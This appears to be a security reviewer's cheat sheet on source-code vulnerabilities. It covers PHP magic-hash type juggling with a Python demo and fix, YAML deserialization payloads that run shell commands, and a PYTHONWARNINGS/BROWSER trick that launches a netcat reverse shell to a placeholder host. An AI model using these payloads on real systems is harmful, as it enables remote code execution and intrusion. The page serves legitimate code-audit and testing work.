Application-related vulnerabilities
Source code analysis
General tools
- Sonarqube (static analysis)
PHP
Filters
Type juggling
- PayloadAllTheThings - Juggling type and magic hashes.
First, it is important to identify which version of PHP is running. Versions 5, 7 and 8 behave differently when it comes to loose comparisons (operators `==` and `!=`). A hash of the form `0e<digits>` is treated as a numeric string equal to zero, so two such hashes compare equal with `==`:

```
php > var_dump("0e123456789012345678901234567890" == md5(240610708));
bool(true)
```
| Hash function | Value | Hashed value |
|---|---|---|
| md5 | 240610708 | 0e462097431906509019562988736854 |
| sha-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 |
| sha-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 |
Grep for loose comparisons in the code base (the pattern skips the strict `===` and `!==` forms):

```
$ rgi '[^=][!=]=[^=]' --glob '*.php'
```
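As an added example (not code from the original page), the following Python script emulates PHP's `==` on two numeric strings, flags a digest that PHP would parse as zero, and contrasts the flawed loose check with the strict comparison a credential check should use (`===` or `hash_equals()` in PHP). The stored hash value is constructed for the demonstration.

```python
import hashlib
import hmac
import re

# PHP's notion of a "numeric string": optional whitespace and sign, decimal
# digits, optional fraction and exponent. A hex digest such as
# "0e462097431906509019562988736854" matches it and evaluates to 0 * 10^N = 0.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP's `==` on two strings: if both are numeric, compare as numbers."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """True if the digest is '0e' followed only by digits, i.e. equal to 0 under `==`."""
    return re.fullmatch(r"0e[0-9]+", hexdigest) is not None


def password_ok_loose(stored_md5: str, candidate: bytes) -> bool:
    """The flawed check, with the semantics of `$stored == md5($candidate)`.
    (md5 is used only because the page's example does; it is unsuitable for passwords.)"""
    return php_loose_equals(stored_md5, hashlib.md5(candidate).hexdigest())


def password_ok_strict(stored_md5: str, candidate: bytes) -> bool:
    """The fix: byte-wise, constant-time comparison (PHP: `===` or hash_equals())."""
    return hmac.compare_digest(stored_md5, hashlib.md5(candidate).hexdigest())


if __name__ == "__main__":
    stored = "0e123456789012345678901234567890"  # constructed: a magic-looking stored hash
    print(is_magic_hash(hashlib.md5(b"240610708").hexdigest()))  # True
    print(password_ok_loose(stored, b"240610708"))                # True: loose check bypassed
    print(password_ok_strict(stored, b"240610708"))               # False: strict check holds
```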
Common functions
assert()
preg_match()
preg_replace()
Deserialization
Execution sinks
Python
Deserialization
pickle
yaml
General resources:
- OWASP Cheatsheet on deserialization with Python
- YAML Deserialization Attack in Python (pdf).
Look for these strings to identify serialized data:

| data | base64 |
|---|---|
| yaml: | eWFtbDog |
| !!python/ | ISFweXRob24v |

Payloads:

```python
import yaml

sleep = b'!!python/object/apply:time.sleep [10]'
system = b'!!python/object/apply:os.system ["id"]'

# Both tags are only honoured by the unsafe loaders (yaml.Loader, yaml.load without
# a safe loader); yaml.safe_load() rejects the !!python/ tags.
payload = system
yaml.load(payload, Loader=yaml.Loader)
```
Environment Variables
When running a Python script, the interpreter checks whether the PYTHONWARNINGS environment variable is set (equivalent to the -W flag). This variable has the form action:message:category:module:line, and the "category" field can be used to import a Python module. One particular module, antigravity, offers code execution as soon as it is imported: it is an Easter egg whose import launches a web browser and opens the XKCD comic about Python.

The web browser used comes from the webbrowser.py module. As can be seen around line 552, the module will execute any command passed in the environment variable BROWSER.
By setting the variables as follows, we can get arbitrary shell command execution:

```
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c '/bin/nc -e /bin/sh <ip> <port>'" python3 <script.py>
```
Another option is to use /bin/bash as BROWSER and set the environment variable BASH_ENV, which is evaluated when Bash starts.
Sources:
Node.js
SQL Injection with Express and MySQL
Authentication bypass can be achieved due to type confusion, as explained here.
Misc
ImageMagick
- Playing with ImageTragick like it's 2016: revisited attacks on ImageMagick by Synacktiv.
JSON
- An Exploration of JSON Interoperability Vulnerabilities: Detailed explanations about the common pitfalls that can arise when passing JSON data between applications (from Bishop Fox Labs).